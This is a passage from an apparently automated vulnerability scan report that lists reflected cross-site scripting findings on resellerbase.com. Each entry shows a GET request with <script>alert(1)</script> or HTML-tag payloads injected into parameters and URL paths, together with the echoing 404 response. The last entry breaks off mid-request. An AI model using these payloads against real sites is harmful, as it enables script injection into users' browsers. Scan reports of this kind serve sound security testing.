2.2980. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e28f1<a>8b66a261991 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Searche28f1<a>8b66a261991&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Searche28f1<a>8b66a261991&opt=2 was not found on this server.</p>
...[SNIP]...

2.2981. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bc2eb<a>1002f605cca was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...bc2eb<a>1002f605cca&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...bc2eb<a>1002f605cca&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2982. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a5889<script>alert(1)</script>c1e96bcb97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a5889<script>alert(1)</script>c1e96bcb97b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&a5889<script>alert(1)</script>c1e96bcb97b=1 was not found on this server.</p>
...[SNIP]...

2.2983. http://www.resellerbase.com/detail/41/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d01b8<a>33d5290c243 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d01b8<a>33d5290c243 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d01b8<a>33d5290c243 was not found on this server.</p>
...[SNIP]...

2.2984. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6631<script>alert(1)</script>f1a3aba9b34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc6631<script>alert(1)</script>f1a3aba9b34/41/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc6631<script>alert(1)</script>f1a3aba9b34/41/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2985. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 422ca<script>alert(1)</script>f72b76e42f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41422ca<script>alert(1)</script>f72b76e42f/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41422ca<script>alert(1)</script>f72b76e42f/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2986. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b22d4<script>alert(1)</script>f84aee3ac64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themesb22d4<script>alert(1)</script>f84aee3ac64/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themesb22d4<script>alert(1)</script>f84aee3ac64/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2987. http://www.resellerbase.com/detail/41/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9b8cf<script>alert(1)</script>c56e052362b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/search.php9b8cf<script>alert(1)</script>c56e052362b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php9b8cf<script>alert(1)</script>c56e052362b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2988. http://www.resellerbase.com/detail/41/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 53b18<a>2c1e5c55c2f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search53b18<a>2c1e5c55c2f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...&Submit3=Search53b18<a>2c1e5c55c2f&opt=2 was not found on this server.</p>
...[SNIP]...

2.2989. http://www.resellerbase.com/detail/41/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 30646<a>6f2a7cab02f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/search.php?keyword=search...30646<a>6f2a7cab02f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...30646<a>6f2a7cab02f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2990. http://www.resellerbase.com/detail/41/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c61a8<script>alert(1)</script>e6af87751a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2&c61a8<script>alert(1)</script>e6af87751a2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2&c61a8<script>alert(1)</script>e6af87751a2=1 was not found on this server.</p>
...[SNIP]...

2.2991. http://www.resellerbase.com/detail/41/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/41/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1a1b4<a>fb3faeed468 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=21a1b4<a>fb3faeed468 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=21a1b4<a>fb3faeed468 was not found on this server.</p>
...[SNIP]...

2.2992. http://www.resellerbase.com/detail/42/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93ab6<script>alert(1)</script>7d08071507e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail93ab6<script>alert(1)</script>7d08071507e/42/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail93ab6<script>alert(1)</script>7d08071507e/42/ was not found on this server.</p>
...[SNIP]...

2.2993. http://www.resellerbase.com/detail/42/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 579aa<script>alert(1)</script>a3a84ff1b86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42579aa<script>alert(1)</script>a3a84ff1b86/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42579aa<script>alert(1)</script>a3a84ff1b86/ was not found on this server.</p>
...[SNIP]...

2.2994. http://www.resellerbase.com/detail/42/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5a07e<script>alert(1)</script>a21172be0ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/?5a07e<script>alert(1)</script>a21172be0ad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/?5a07e<script>alert(1)</script>a21172be0ad=1 was not found on this server.</p>
...[SNIP]...

2.2995. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3e27<script>alert(1)</script>feed00891a2abcb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailb3e27<script>alert(1)</script>feed00891a2abcb4d/42/rating.php?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb3e27<script>alert(1)</script>feed00891a2abcb4d/42/rating.php?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.2996. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2680<script>alert(1)</script>637c5f89d73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild2680<script>alert(1)</script>637c5f89d73/42/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild2680<script>alert(1)</script>637c5f89d73/42/rating.php was not found on this server.</p>
...[SNIP]...

2.2997. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be5ea<script>alert(1)</script>de25e3a9f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42be5ea<script>alert(1)</script>de25e3a9f0d/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42be5ea<script>alert(1)</script>de25e3a9f0d/rating.php was not found on this server.</p>
...[SNIP]...

2.2998. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53032<script>alert(1)</script>8093c8ea8b48715fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4253032<script>alert(1)</script>8093c8ea8b48715fa/rating.php?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
